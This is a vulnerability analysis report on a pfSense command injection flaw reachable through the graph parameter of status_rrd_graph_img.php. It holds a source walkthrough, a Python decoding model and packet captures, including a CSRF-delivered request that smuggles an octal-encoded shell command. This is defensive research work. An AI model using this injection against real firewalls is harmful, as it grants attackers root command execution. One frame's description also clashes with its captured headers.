Revision 1.0
Revision History
Revision 1.0 2016-05-02
Table of Contents
1. Identity of Problem
1.1. Brief Description
1.2. CVE Reference
1.3. OSVDB Reference
1.4. Vendor Advisory
1.5. Discoverer Advisory
1.6. Other Advisories
1.7. Notes
1.8. Vulnerability Classification and Severity
2. Affected Products
2.1. Products Directly Affected by the Vulnerability
2.2. Other Products Embedding the Vulnerable Product
3. Problem Location
3.1. Program
3.2. Function or Method
3.3. Parameters
3.4. Data Objects
4. Problem Mechanism
4.1. Technical Mechanism
4.2. Source Code Walkthrough
4.3. Open Questions to Resolve
5. Triggering the Problem
5.1. Prerequisites
5.2. Triggering Conditions
5.3. Protocol Flow Diagram
5.4. Attack Delivery
5.5. Packet Decodes
6. Attack Detection
6.1. Remote Detection of Generic Attacks
6.2. Remote Detection of Known Exploits
7. Exploit Reproduction
7.1. Exploit Overview
7.2. Exploit Code
8. Public Exploits
8.1. Public Exploit [SA]
9. Remediation Details
10. Related Research
11. Credits
1. Identity of Problem
1.1. Brief Description
A command injection vulnerability has been reported in ESF pfSense. The vulnerability is due to
status_rrd_graph_img.php failing to validate the graph HTTP parameter before using it in a shell command.
A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF weakness in the same page and
entice an authenticated user to issue the crafted request (for example by following a hyperlink), since the script
accepts its parameters in a plain GET request authenticated only by the session cookie. Successful exploitation
results in arbitrary command execution with root privileges.
Reference: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
Reference: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
1.7. Notes
Not available.
1.8. Vulnerability Classification and Severity
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Reference: https://cwe.mitre.org/data/definitions/78.html
1.8.3. Severity
The severity classification of this vulnerability is high. This rating was determined through consideration of the
following factors: successful exploitation yields arbitrary command execution as root on the firewall itself, while
exploitation requires either an authenticated webConfigurator session or a CSRF-assisted request issued by an
authenticated user.
2. Affected Products
2.1. Products Directly Affected by the Vulnerability
Electric Sheep Fencing pfSense prior to 2.3
3. Problem Location
3.1. Program
The vulnerable program is status_rrd_graph_img.php.
3.3. Parameters
The vulnerable parameter is the HTTP parameter graph.
4. Problem Mechanism
4.1. Technical Mechanism
pfSense is an open source network firewall distribution based on the FreeBSD operating system. The distribution
provides a simple and intuitive WebGUI for configuring and managing a network firewall. Configuration is managed
either through the CLI or through a web interface called the webConfigurator. The webConfigurator is a web
application capable of configuring and managing the firewall as well as other components of the pfSense
distribution. All interaction with the interface is performed via HTTP over port 80/TCP or HTTPS over 443/TCP.
HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF
where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypage.htm?param=1 HTTP/1.1
Host: www.myhost.com
A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypage.htm HTTP/1.1
Host: www.myhost.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
param=1
If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...
A command injection vulnerability exists in ESF pfSense. This vulnerability is due to status_rrd_graph_img.php
failing to sanitize the graph HTTP parameter. Specifically, the script does not reject the pipe "|" (ASCII 0x7C) or
grave accent "`" (ASCII 0x60) characters in the value. The value is interpolated into a shell command string that is
executed via PHP's exec(), which hands the string to the system shell, so a less privileged webConfigurator user can
inject arbitrary OS commands that run with the privileges of the web server process, which on pfSense is root.
As described in section 1.1, the crafted request can be sent directly by an authenticated attacker or delivered via
CSRF by enticing an authenticated user to issue it; in both cases the injected commands execute as root.
4.2. Source Code Walkthrough
The following excerpt from status_rrd_graph_img.php shows where the command is executed. $curgraph holds the
unvalidated value of the graph parameter, and $graphcmd is the rrdtool command line in which that value (as part
of the output path "$rrdtmppath$curdatabase-$curgraph.png") has already been interpolated without quoting. exec()
passes the string to the system shell, so a shell metacharacter in the parameter terminates the rrdtool command and
starts a new one. Because the injected value makes the PNG path unique, the file_exists() check fails and the else
branch runs the command unconditionally, so the 15-second cache check never gets in the attacker's way.

    // The style parameter is read straight from the query string; the graph and
    // database parameters are handled the same way earlier in the script (not shown).
    if ($_GET['style']) {
        $curstyle = $_GET['style'];
    } else {
        $curstyle = "inverse";
    }
    // $graphcmd (built earlier, not shown) already contains $curgraph unquoted.
    if (file_exists("$rrdtmppath$curdatabase-$curgraph.png")) {
        // A cached image exists: regenerate it only if it is at least 15 seconds old.
        if ((time() - filemtime("$rrdtmppath$curdatabase-$curgraph.png")) >= 15) {
            if ($data) {
                // Injection point: the attacker-controlled string reaches /bin/sh here.
                $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
                $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
                flush();
                usleep(500);
            }
        }
    } else {
        // No cached image: generate it unconditionally, through the same injection point.
        if ($data) {
            $_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
            $graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
            flush();
            usleep(500);
        }
    }
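The following Python model is an added example for this report, not pfSense code. It URL-decodes the query string
captured in section 5.5 as PHP's $_GET would, interpolates the values into a command line, and splits that line
into pipeline stages the way /bin/sh does, so that the command the firewall actually executes can be read off.
GRAPHCMD_TEMPLATE and RRD_TMP_PATH are assumptions: only the unquoted "$rrdtmppath$curdatabase-$curgraph.png"
output path is taken from the script, the other rrdtool arguments are placeholders. build_graphcmd_safe is an
illustrative hardened builder and is not the vendor's fix.

```python
import re
import shlex
from urllib.parse import parse_qs

RRD_TMP_PATH = "/tmp/"  # assumed value of $rrdtmppath

# Assumed stand-in for $graphcmd. Only the "<tmp><database>-<graph>.png" output
# path is taken from the report; the other rrdtool arguments are placeholders.
GRAPHCMD_TEMPLATE = (
    "/usr/local/bin/rrdtool graph {tmp}{database}-{graph}.png "
    "--start -86400 --end now DEF:in={database}:inpass:AVERAGE LINE1:in#0000FF"
)

# Query string of the injected request captured in section 5.5, verbatim.
CAPTURED_QUERY = (
    r"database=-throughput.rrd&graph=file|printf%20\\164\\157\\165\\143\\150"
    r"\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo"
)

# Whitelist for the hardened builder: a name may not start with "-" so that it
# can never be parsed as an rrdtool option.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_-]*(\.rrd)?")


def query_params(query):
    """URL-decode the query string the way PHP fills $_GET (first value wins)."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def build_graphcmd(database, graph):
    """Mirror of the PHP interpolation: no validation, no quoting."""
    return GRAPHCMD_TEMPLATE.format(tmp=RRD_TMP_PATH, database=database, graph=graph)


def pipeline_stages(cmd):
    """argv of each stage of an unquoted pipeline, as /bin/sh -c would see it.
    shlex.split in POSIX mode applies the same word splitting and backslash
    removal as the shell, so the doubled backslashes on the wire reach printf
    as single ones."""
    return [shlex.split(stage) for stage in cmd.split("|")]


def printf_octal(fmt):
    """Expand the \\NNN octal escapes printf(1) interprets in its format string."""
    return re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), fmt)


def injected_shell_input(query):
    """What the injected 'sh' stage reads on stdin for this request, i.e. the
    command that actually runs as root; None when no printf stage is present."""
    params = query_params(query)
    stages = pipeline_stages(build_graphcmd(params["database"], params["graph"]))
    for argv in stages[1:]:
        if argv[:1] == ["printf"]:
            return printf_octal(" ".join(argv[1:]))
    return None


def build_graphcmd_safe(database, graph):
    """Illustrative hardening (not the vendor's patch): reject anything outside
    the whitelist and return an argv list, so no shell is involved at all."""
    for value in (database, graph):
        if not SAFE_NAME.fullmatch(value):
            raise ValueError(f"rejected parameter value: {value!r}")
    return [
        "/usr/local/bin/rrdtool", "graph", f"{RRD_TMP_PATH}{database}-{graph}.png",
        "--start", "-86400", "--end", "now",
        f"DEF:in={database}:inpass:AVERAGE", "LINE1:in#0000FF",
    ]


if __name__ == "__main__":
    params = query_params(CAPTURED_QUERY)
    for argv in pipeline_stages(build_graphcmd(params["database"], params["graph"])):
        print(argv)
    print("sh executes:", injected_shell_input(CAPTURED_QUERY))
```

Run stand-alone, the model prints four stages: the truncated rrdtool command, printf with the octal escapes (reduced
to single backslashes by the shell), sh, and echo.png followed by the rest of the template. That last stage is why
the payload ends in |echo: the template's trailing ".png ..." text lands on a throwaway command instead of being
glued onto sh, and the sh stage reads "touch /tmp/test" from printf, which matches the file the proof of concept
creates (section 7.1).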
5.3. Protocol Flow Diagram
The target user (an authenticated webConfigurator session, either the attacker's own or that of a CSRF victim) sends
the crafted HTTP request to the target server:
[ Target User ] -----------------> [ Target Server ]
5.4.2. IP protocols
Not available.
5.4.4. Notes
Not applicable.
5.5. Packet Decodes
The first request/response pair below is a plain request for status_rrd_graph_img.php from the target user
(172.16.8.206) to the pfSense host (172.16.8.192); frame 6 is its response. The remaining frames show the CSRF
delivery: the target user fetches poc.html from the attacker's web server (172.16.1.2, frame 4), then follows the
link, which issues the injected request to the pfSense host; the response (frame 13) carries a PHP warning from
status_rrd_graph_img.php rather than an image.
0000 00 50 56 bd 7f 60 00 50 56 bd e4 13 08 00 45 00 .PV..`.PV.....E.
0010 01 de 0e 5a 40 00 80 06 81 11 ac 10 08 ce ac 10 ...Z@...........
0020 08 c0 c0 c0 00 50 90 2b b3 5b fa 4d 4d 1a 50 18 .....P.+.[.MM.P.
0030 fa f0 f7 3c 00 00 47 45 54 20 2f 73 74 61 74 75 ...<..GET /statu
0040 73 5f 72 72 64 5f 67 72 61 70 68 5f 69 6d 67 2e s_rrd_graph_img.
0050 70 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f php HTTP/1.1..Ho
0060 73 74 3a 20 31 37 32 2e 31 36 2e 38 2e 31 39 32 st: 172.16.8.192
0070 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 ..Connection: ke
0080 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 ep-alive..Accept
0090 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c : text/html,appl
00a0 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d ication/xhtml+xm
00b0 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d l,application/xm
00c0 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 65 2f 77 65 l;q=0.9,image/we
00d0 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 55 70 bp,*/*;q=0.8..Up
00e0 67 72 61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 grade-Insecure-R
00f0 65 71 75 65 73 74 73 3a 20 31 0d 0a 55 73 65 72 equests: 1..User
0100 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f -Agent: Mozilla/
0110 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 5.0 (Windows NT
0120 36 2e 31 29 20 41 70 70 6c 65 57 65 62 4b 69 74 6.1) AppleWebKit
0130 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 /537.36 (KHTML,
0140 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f like Gecko) Chro
0150 6d 65 2f 35 30 2e 30 2e 32 36 36 31 2e 37 35 20 me/50.0.2661.75
0160 53 61 66 61 72 69 2f 35 33 37 2e 33 36 0d 0a 41 Safari/537.36..A
0170 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 ccept-Encoding:
0180 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 2c 20 73 gzip, deflate, s
0190 64 63 68 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 dch..Accept-Lang
01a0 75 61 67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 uage: en-US,en;q
01b0 3d 30 2e 38 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 =0.8..Cookie: PH
01c0 50 53 45 53 53 49 44 3d 33 35 65 64 65 65 33 32 PSESSID=35edee32
01d0 31 35 38 63 31 61 32 61 33 39 62 37 36 62 39 37 158c1a2a39b76b97
[...Truncated for readability...]
01e0 63 61 38 65 61 61 61 36 0d 0a 0d 0a ca8eaaa6....
Frame 6: 1514 bytes on wire (12112 bits), 1514 bytes captured (12112 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49344 (49344), Seq: 1, Ack: 439, Len: 1460
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:31:34 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
0000 00 50 56 bd e4 13 00 50 56 bd 7f 60 08 00 45 00 .PV....PV..`..E.
0010 05 dc 46 7f 40 00 40 06 84 ee ac 10 08 c0 ac 10 ..F.@.@.........
0020 08 ce 00 50 c0 c0 fa 4d 4d 1a 90 2b b5 11 50 10 ...P...MM..+..P.
0030 ff ff 48 d5 00 00 48 54 54 50 2f 31 2e 31 20 32 ..H...HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 33 31 3a 33 34 20 47 4d 54 0d 0a 45 20:31:34 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 33 31 3a Apr 2016 18:31:
0170 33 35 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 35 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 33 31 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 31:35 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
[...Truncated for readability...]
05c0 23 cc a2 45 8b 1a ea 4b c3 b8 dd e3 a9 6a bf aa #..E...K.....j..
05d0 dc c7 54 52 7a cc 98 31 e6 73 9f fb 9c 79 fa e9 ..TRz..1.s...y..
05e0 a7 33 ff 84 18 d7 c8 6f 66 9c .3.....of.
Frame 4: 444 bytes on wire (3552 bits), 444 bytes captured (3552 bits)
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d)
Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.1.2 (172.16.1.2)
Transmission Control Protocol, Src Port: 49359 (49359), Dst Port: http (80), Seq: 1, Ack: 1, Len: 390
Hypertext Transfer Protocol
GET /~ssivakumaran/pfsense/poc.html HTTP/1.1\r\n
Host: 172.16.1.2\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
\r\n
0000 a0 d3 c1 f1 4a 7d 00 50 56 bd e4 13 08 00 45 00 ....J}.PV.....E.
0010 01 ae 11 45 40 00 80 06 86 14 ac 10 08 ce ac 10 ...E@...........
0020 01 02 c0 cf 00 50 d8 27 1e 87 d5 9a 57 c2 50 18 .....P.'....W.P.
0030 01 00 5e 3c 00 00 47 45 54 20 2f 7e 73 73 69 76 ..^<..GET /~ssiv
0040 61 6b 75 6d 61 72 61 6e 2f 70 66 73 65 6e 73 65 akumaran/pfsense
0050 2f 70 6f 63 2e 68 74 6d 6c 20 48 54 54 50 2f 31 /poc.html HTTP/1
0060 2e 31 0d 0a 48 6f 73 74 3a 20 31 37 32 2e 31 36 .1..Host: 172.16
0070 2e 31 2e 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e .1.2..Connection
0080 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 : keep-alive..Ac
0090 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c cept: text/html,
00a0 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d application/xhtm
00b0 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f l+xml,applicatio
00c0 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 n/xml;q=0.9,imag
00d0 65 2f 77 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 e/webp,*/*;q=0.8
00e0 0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75 ..Upgrade-Insecu
00f0 72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a re-Requests: 1..
0100 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0110 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 lla/5.0 (Windows
0120 20 4e 54 20 36 2e 31 29 20 41 70 70 6c 65 57 65 NT 6.1) AppleWe
0130 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 bKit/537.36 (KHT
0000 00 50 56 bd e4 13 a0 d3 c1 f1 4a 7d 08 00 45 00 .PV.......J}..E.
0010 02 bf 01 69 40 00 40 06 d4 df ac 10 01 02 ac 10 ...i@.@.........
0020 08 ce 00 50 c0 cf d5 9a 57 c2 d8 27 20 0d 50 18 ...P....W..' .P.
0030 00 7b 93 ab 00 00 48 54 54 50 2f 31 2e 31 20 32 .{....HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 00 OK..Date: Thu
0050 2c 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 , 28 Apr 2016 18
0060 3a 34 37 3a 31 32 20 47 4d 54 0d 0a 53 65 72 76 :47:12 GMT..Serv
0070 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 er: Apache/2.4.6
0080 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 (CentOS) OpenSS
0090 4c 2f 31 2e 30 2e 31 65 2d 66 69 70 73 20 50 48 L/1.0.1e-fips PH
00a0 50 2f 35 2e 34 2e 31 36 20 6d 6f 64 5f 77 73 67 P/5.4.16 mod_wsg
00b0 69 2f 33 2e 34 20 50 79 74 68 6f 6e 2f 32 2e 37 i/3.4 Python/2.7
00c0 2e 35 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 .5..Last-Modifie
00d0 64 3a 20 54 68 75 2c 20 32 38 20 41 70 72 20 32 d: Thu, 28 Apr 2
00e0 30 31 36 20 31 38 3a 33 31 3a 31 38 20 47 4d 54 016 18:31:18 GMT
00f0 0d 0a 45 54 61 67 3a 20 22 31 33 33 2d 35 33 31 ..ETag: "133-531
0100 38 66 62 62 36 62 61 31 33 30 22 0d 0a 41 63 63 8fbb6ba130"..Acc
0110 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 ept-Ranges: byte
0120 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 s..Content-Lengt
0130 68 3a 20 33 30 37 0d 0a 4b 65 65 70 2d 41 6c 69 h: 307..Keep-Ali
0140 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d ve: timeout=5, m
0150 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 ax=100..Connecti
0160 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a on: Keep-Alive..
0170 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 Content-Type: te
0180 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 xt/html; charset
0190 3d 55 54 46 2d 38 0d 0a 0d 0a 3c 68 74 6d 6c 3e =UTF-8....<html>
01a0 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 . <head>. <t
01b0 69 74 6c 65 3e 54 45 4c 55 53 20 53 65 63 75 72 itle>TELUS Secur
01c0 69 74 79 20 4c 61 62 73 20 50 6f 43 3c 2f 74 69 ity Labs PoC</ti
01d0 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 tle>. </head>.
[...Truncated for readability...]
02a0 68 6f 22 3e 43 6c 69 63 6b 20 68 65 72 65 20 66 ho">Click here f
02b0 6f 72 20 50 6f 43 3c 2f 61 3e 0a 20 20 3c 2f 62 or PoC</a>. </b
02c0 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a ody>.</html>.
GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\164\\157\\165\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo HTTP/1.1\r\n
Host: 172.16.8.192\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Referer: http://172.16.1.2/~ssivakumaran/pfsense/poc.html\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: PHPSESSID=9ef619062013b1690743c6265f32a760\r\n
\r\n
0000 00 50 56 bd 7f 60 00 50 56 bd e4 13 08 00 45 00 .PV..`.PV.....E.
0010 02 9a 11 4c 40 00 80 06 7d 63 ac 10 08 ce ac 10 ...L@...}c......
0020 08 c0 c0 d0 00 50 b4 59 66 5b 16 f6 a6 e9 50 18 .....P.Yf[....P.
0030 01 00 3b 44 00 00 47 45 54 20 2f 73 74 61 74 75 ..;D..GET /statu
0040 73 5f 72 72 64 5f 67 72 61 70 68 5f 69 6d 67 2e s_rrd_graph_img.
0050 70 68 70 3f 64 61 74 61 62 61 73 65 3d 2d 74 68 php?database=-th
0060 72 6f 75 67 68 70 75 74 2e 72 72 64 26 67 72 61 roughput.rrd&gra
0070 70 68 3d 66 69 6c 65 7c 70 72 69 6e 74 66 25 32 ph=file|printf%2 << suspicious content
0080 30 5c 5c 31 36 34 5c 5c 31 35 37 5c 5c 31 36 35 0\\164\\157\\165
0090 5c 5c 31 34 33 5c 5c 31 35 30 5c 5c 30 34 30 5c \\143\\150\\040\
00a0 5c 30 35 37 5c 5c 31 36 34 5c 5c 31 35 35 5c 5c \057\\164\\155\\
00b0 31 36 30 5c 5c 30 35 37 5c 5c 31 36 34 5c 5c 31 160\\057\\164\\1
00c0 34 35 5c 5c 31 36 33 5c 5c 31 36 34 7c 73 68 7c 45\\163\\164|sh|
00d0 65 63 68 6f 20 48 54 54 50 2f 31 2e 31 0d 0a 48 echo HTTP/1.1..H
00e0 6f 73 74 3a 20 31 37 32 2e 31 36 2e 38 2e 31 39 ost: 172.16.8.19
00f0 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 2..Connection: k
0100 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 eep-alive..Accep
0110 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 t: text/html,app
0120 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 lication/xhtml+x
0130 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 ml,application/x
0140 6d 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 65 2f 77 ml;q=0.9,image/w
0150 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 55 ebp,*/*;q=0.8..U
0160 70 67 72 61 64 65 2d 49 6e 73 65 63 75 72 65 2d pgrade-Insecure-
0170 52 65 71 75 65 73 74 73 3a 20 31 0d 0a 55 73 65 Requests: 1..Use
0180 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 r-Agent: Mozilla
0190 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 /5.0 (Windows NT
01a0 20 36 2e 31 29 20 41 70 70 6c 65 57 65 62 4b 69 6.1) AppleWebKi
01b0 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c t/537.36 (KHTML,
01c0 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 like Gecko) Chr
01d0 6f 6d 65 2f 35 30 2e 30 2e 32 36 36 31 2e 37 35 ome/50.0.2661.75
[...Truncated for readability...]
0280 53 49 44 3d 39 65 66 36 31 39 30 36 32 30 31 33 SID=9ef619062013
0290 62 31 36 39 30 37 34 33 63 36 32 36 35 66 33 32 b1690743c6265f32
02a0 61 37 36 30 0d 0a 0d 0a a760....
Frame 13: 667 bytes on wire (5336 bits), 667 bytes captured (5336 bits)
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Internet Protocol Version 4, Src: 172.16.8.192 (172.16.8.192), Dst: 172.16.8.206 (172.16.8.206)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49360 (49360), Seq: 1, Ack: 627, Len: 613
Hypertext Transfer Protocol
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:48:52 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:48:52 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:48:52 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
Media Type
Media Type: image/png (175 bytes)
0020 08 ce 00 50 c0 d0 16 f6 a6 e9 b4 59 68 cd 50 18 ...P.......Yh.P.
0030 02 01 42 dc 00 00 48 54 54 50 2f 31 2e 31 20 32 ..B...HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 34 38 3a 35 32 20 47 4d 54 0d 0a 45 20:48:52 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
